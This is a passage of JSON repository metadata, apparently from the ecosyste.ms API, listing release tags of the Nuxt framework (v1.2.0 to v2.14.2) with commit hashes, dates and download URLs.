ame":"v2.14.2","sha":"34c56722c8c97c0c6a59ecfbc5836c38047e4572","kind":"tag","published_at":"2020-08-16T10:59:06.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.14.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.2/manifests"},{"name":"v2.14.1","sha":"c30499d7e02cd6d8b51d97ee7d7a537d8a59f63b","kind":"tag","published_at":"2020-08-04T16:37:13.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.14.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.1/manifests"},{"name":"v2.14.0","sha":"60f68638cb80ab461c5b02be34e8797677bd8dd1","kind":"tag","published_at":"2020-07-27T17:25:24.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.0/manifests"},{"name":"v2.13.3","sha":"e3821ba78c23fafa753941a0c206bd23e39dd678","kind":"tag","published_at":"2020-07-02T18:08:18.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.13.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.13.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.13.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.13.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.13.3/manifests"},{"name":"v2.13.2","sha":"c998072c94eef659d45819eaa2b18897b8923538","kind":"tag","published_at":"2020-06-26T19:03:12.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.13.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.13.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.13.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.13.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.13.2/manifests"},{"name":"v2.13.1","sha":"56b158e7d689ba9f57e7aa83d672f5f32b18767b","kind":"tag","published_at":"2020-06-24T08:38:23.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.13.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.13.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.13.1/manifests"},{"name":"v2.13.0","sha":"dbecbe4adae6a7ae172eb01a232d1804c7b996bc","kind":"tag","published_at":"2020-06-18T17:45:27.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.13.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.13.0/manifests"},{"name":"v2.12.2","sha":"fb33bda6d114cde19b029ab71c810032ef51184f","kind":"tag","published_at":"2020-03-31T10:43:15.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.12.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.12.2/manifests"},{"name":"v2.12.1","sha":"8d355956d49c71349d165c4ca7531107e20d7b27","kind":"tag","published_at":"2020-03-25T19:22:04.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.12.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.12.1/manifests"},{"name":"v2.12.0","sha":"205a089f833f96298d9bd723aea15b93618ec05d","kind":"tag","published_at":"2020-03-17T16:45:28.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.12.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.12.0/manifests"},{"name":"v2.11.0","sha":"7af9ec8c23d247b22f71866b7b5dcd100f08048d","kind":"tag","published_at":"2019-12-17T10:23:56.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.11.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.11.0/manifests"},{"name":"v2.10.2","sha":"f6aa45dda605cae2ea51f7413c97190a7a02cb88","kind":"commit","published_at":"2019-10-21T21:16:29.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.10.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.10.2/manifests"},{"name":"v2.10.1","sha":"624c4c058e47fd36c484efaf1494b762f585f633","kind":"tag","published_at":"2019-10-11T08:11:06.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.10.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.10.1/manifests"},{"name":"v2.10.0","sha":"c17afa77a7c7490863c2040c8f448ba80082a891","kind":"tag","published_at":"2019-10-02T11:44:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.10.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.10.0/manifests"},{"name":"v2.9.2","sha":"c8ee9a660809e856c28d8678c6a632bbdd6ed00f","kind":"tag","published_at":"2019-08-28T11:32:13.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.9.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.9.2/manifests"},{"name":"v2.9.1","sha":"0157b971de97daecf2fadeafa5596ddaa30cdb28","kind":"tag","published_at":"2019-08-20T11:13:09.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.9.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.9.1/manifests"},{"name":"v2.9.0","sha":"ce3b4569613866a69b96f0f89aa2bb7d9810f8c4","kind":"tag","published_at":"2019-08-20T08:24:09.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.9.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.9.0/manifests"},{"name":"v2.8.1","sha":"2fabea9402864828fe9aafe8b0d13bcc674a1b3b","kind":"tag","published_at":"2019-06-04T20:28:35.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.8.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.8.1/manifests"},{"name":"v2.8.0","sha":"82ec7b7dedfbc3a01b981a0ef72375814e023291","kind":"tag","published_at":"2019-05-30T17:09:23.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.8.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.8.0/manifests"},{"name":"v2.7.1","sha":"0f609dfb3772ec2682bf67c42762df6041dab034","kind":"tag","published_at":"2019-05-14T18:56:35.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.7.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.7.1/manifests"},{"name":"v2.7.0","sha":"5a98230ec617582f7b9393ad27e20fb5a1e6aa04","kind":"tag","published_at":"2019-05-14T12:38:09.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.7.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.7.0/manifests"},{"name":"v2.6.3","sha":"2108cd669c56bb2e566c35ac73d8e693b5ce5c54","kind":"tag","published_at":"2019-04-25T08:43:24.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.6.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.6.3/manifests"},{"name":"v2.6.2","sha":"8d14cd4781095dff46a57ae05d60bbaccefb0fbd","kind":"tag","published_at":"2019-04-21T11:22:10.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.6.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.6.2/manifests"},{"name":"v2.6.1","sha":"c0776eb2d78f839d2b1249765d2eb117b5f32d2e","kind":"tag","published_at":"2019-04-04T17:58:06.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.6.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.6.1/manifests"},{"name":"v2.6.0","sha":"0e51676731e975226a7135003b941b9077256641","kind":"tag","published_at":"2019-04-04T17:06:17.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.6.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.6.0/manifests"},{"name":"v2.5.1","sha":"5d7757bf299c724bb52df529c5dbd1a341b19951","kind":"tag","published_at":"2019-03-21T21:48:39.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.5.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.5.1/manifests"},{"name":"v2.5.0","sha":"e2c296321b8f70c3e977ed11a0825870a2cc528a","kind":"tag","published_at":"2019-03-21T13:07:34.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.5.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.5.0/manifests"},{"name":"v2.4.5","sha":"0ad13e04d2cae232d807ba0dd100b8f3f7bbb010","kind":"commit","published_at":"2019-02-26T10:31:42.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.4.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.4.5/manifests"},{"name":"v2.4.3","sha":"13e494c0f0013252994eb0de0c4d92bd507b119d","kind":"tag","published_at":"2019-02-06T15:56:54.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.4.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.4.3/manifests"},{"name":"v2.4.2","sha":"32b0f155c97a5c7f7cb7cc450274e10a492c9c39","kind":"tag","published_at":"2019-01-30T15:15:06.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.4.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.4.2/manifests"},{"name":"v2.4.0","sha":"5f221b4b7e39e4804bde682b2e71780a7a1e2845","kind":"tag","published_at":"2019-01-28T17:41:28.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.4.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.4.0/manifests"},{"name":"v1.4.5","sha":"c8962964b8ced4c703804ed9cc5e54c6d486a321","kind":"tag","published_at":"2018-11-27T17:37:42.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.4.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.5/manifests"},{"name":"v2.3.4","sha":"16c5b892fa3104992f3a6778ac97a0fcb1ca657c","kind":"tag","published_at":"2018-11-26T17:50:03.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.3.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.3.4/manifests"},{"name":"v2.3.2","sha":"205c9d38156c60d93248b9d973a615eee7355f22","kind":"tag","published_at":"2018-11-20T20:49:05.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.3.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.3.2/manifests"},{"name":"v2.3.1","sha":"f75a4423354f16603a6b733ca12d873e501f4442","kind":"tag","published_at":"2018-11-16T19:28:01.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.3.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.3.1/manifests"},{"name":"v1.4.4","sha":"8fb8376ff70b9db5feda4492009b0fb7d3e2884a","kind":"tag","published_at":"2018-10-19T14:00:22.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.4.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.4/manifests"},{"name":"v1.4.3","sha":"f5aff938f7742624708b4eecc7a2b003c1a1d161","kind":"tag","published_at":"2018-10-19T13:45:13.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.4.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.3/manifests"},{"name":"v2.3.0","sha":"dbf3ccc4c142083a76fbc4f3281f04e9b3044b79","kind":"commit","published_at":"2018-10-17T21:35:43.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.3.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.3.0/manifests"},{"name":"v2.2.0","sha":"e3b72ded5c56b62ca25f180390a1d60ce8123b5b","kind":"tag","published_at":"2018-10-13T19:07:52.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.2.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.2.0/manifests"},{"name":"v2.1.0","sha":"fdb225fbeb452a421f1484e3a1a16f26952d386e","kind":"tag","published_at":"2018-09-30T16:28:05.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.1.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.1.0/manifests"},{"name":"v2.0.0","sha":"7a68e1dde17e0ed7eb7598d9c63ca1ac2383b76e","kind":"commit","published_at":"2018-09-20T21:57:16.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.0.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.0.0/manifests"},{"name":"v1.4.2","sha":"376dd35ba9465e1163a800bd0512654f68436b5f","kind":"tag","published_at":"2018-08-01T19:59:59.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.4.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.2/manifests"},{"name":"v1.4.1","sha":"5b7e27a1af4aa0d212766513693949f9d7917bd5","kind":"tag","published_at":"2018-06-06T13:01:31.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.4.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.1/manifests"},{"name":"v1.4.0","sha":"85b584693cd1e689406ad722b47735fa7d0faf26","kind":"tag","published_at":"2018-03-01T16:45:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.4.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.0/manifests"},{"name":"v1.3.0","sha":"1582df149d7f18402faa58c47e080e3f0cc52a16","kind":"tag","published_at":"2018-01-31T16:13:24.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.3.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.3.0/manifests"},{"name":"v1.2.1","sha":"f0bd9a573b3756a6f878b3964222679a8c58beaa","kind":"tag","published_at":"2018-01-26T12:24:36.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.2.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.2.1/manifests"},{"name":"v1.2.0","sha":"78494dac927681007ea6725b4548db8fd838ed16","kind":"tag","published_at":"2018-01-26T11:54:27.000Z","download_url":"https://codeload.github.com/nuxt/nux